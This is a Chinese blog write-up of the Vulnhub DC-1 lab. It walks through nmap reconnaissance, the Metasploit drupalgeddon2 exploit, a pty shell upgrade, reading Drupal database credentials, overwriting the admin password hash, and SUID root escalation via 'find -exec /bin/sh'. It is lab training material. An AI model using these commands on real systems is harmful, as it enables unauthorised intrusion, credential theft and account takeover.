Vulnhub靶机DC1渗透测试详解
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
Vulnhub靶机下载:
官网地址:https://www.vulnhub.com/entry/dc-1,292/
Vulnhub靶机安装:
下载好了把安装包解压 然后试用VMware即可。
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover发现主机
渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.7
使用命令:
nmap -sS -sV -A -n 172.16.5.7
先访问一下80端口 发现是一个CMS 下标有个Drupal
②:漏洞发现:
首先要了解一下Drupal,Drupal是开源CMS之一,Drupal是CMS内容管理系统,并且在世界各地使用,受到高度赞赏,Drupal可以作为开源软件免费使用,就是附带了cms的php开发框架。
搜了一下相关的drupal 漏洞 打开msf 看一下有哪些具体的模块可以使用 exploit/unix/webapp/drupal_drupalgeddon2
③:漏洞利用:
进入后渗透模块 ls 查看 有i个flag1.txt cat一下 提示:让我们看一下配置文件 durpal配置 /sites/default/settings.php
进入durpa配置文件在 settings.php 发现 flag2 和数据库一些信息
使用netstat -anptl查看3306是否开放,结果只允许本地连接
写一个python交互:python -c "import pty;pty.spawn(’/bin/bash‘)" (容易打错,切记要细心!!)
然后登入数据库 mysql -u 用户名 -p 密码 即可。
show databases; ##列出数据库
use drupaldb; ##使用drupaldb库
show tables; ##查看里面的表
查看users表select * from users;
在scripts录有password-hash.sh文件,可以用该文件生成自己的密码hash值替换数据库hash,达到登陆后台的目的 这里我写的password 。
使用 php scripts/password-hash.sh password
update drupaldb.users set pass="$S$DYyHOGvUlVey/TRbXOU7.Gsp2wKX.9Q9Jt/SFd085Xhq.cAR.S0u" where name="admin"; ##修改密码
Flag3提示词有perms、find、-exec、shadow共四个特殊提示词
④:SUID提权:
cat /etc/passwd 发现了一个用户 flag4
使用find命令查找有特殊权限suid的命令:find / -perm -4000
使用find命令提权
find ./ aaa -exec '/bin/sh' \;
⑤:获取Flag:
至此五个flag全部找出来了,渗透测试结束。
Vulnhub靶机渗透总结:
这个靶场也不难 只要细心一点就可以了,需要主要的一些细节就是 :
1.写python交互的时候 要注意 容易写错,自己试了好几遍才成功的!!
2.数据库修改密码 因为 shell里面是不能复制的所以 手动打的话 还是要认真仔细不然也容易出错。
3.学习了使用find命令找suid和提权
最后 自己也会把这系列的靶机更新啦,创作不易 希望对大家有所帮助!!
4466
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
